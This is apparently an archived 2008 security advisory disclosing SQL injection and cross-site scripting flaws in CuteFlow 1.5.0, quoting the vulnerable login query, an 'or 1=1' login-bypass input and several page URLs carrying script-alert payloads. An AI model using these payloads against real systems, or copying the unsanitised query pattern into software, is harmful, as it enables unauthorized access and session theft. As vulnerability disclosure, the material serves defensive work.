Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Simple Machines Forum 1.4

JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities

From:	hadihadi_zedehal_2006_(at)_yahoo.com <hadihadi_zedehal_2006_(at)_yahoo.com>
Date:	30.03.2008
Subject:	CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities

            #####################################################################
###
            #                                                                      #
            #     CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities           #
            #                      [sql injection & Xss]                                       #
            #####################################################################
###

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discoverd By : hadihadi

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)

sql vuln code in login.php:

$query = "select * from cf_user where strPassword = '$strMd5Password' AND strUserId = '".$_REQUEST["UserId"]."'";

-----------------------
the login forme included in index.php you must login in index.php ;)
vuln:
login:admin ' or 1=1/*
password:whatever
-------------------------------------
and you can see xss vuln too here:

/page/showcirculation.
php?language=<script>alert(1111)</script>
/pages/edittemplate_step2.
php?language=<script>alert(1111)</script>
/pages/showfields.
php?language=<script>alert(1111)</script>>
/pages/showuser.php?language=<script>alert(1111)</script>
/pages/editmailinglist_step1.
php?language=<script>alert(222)</script>
/pages/showtemplates.
php?language=<script>alert(1111)</script>
-------------------------
tnx all h4ck3rz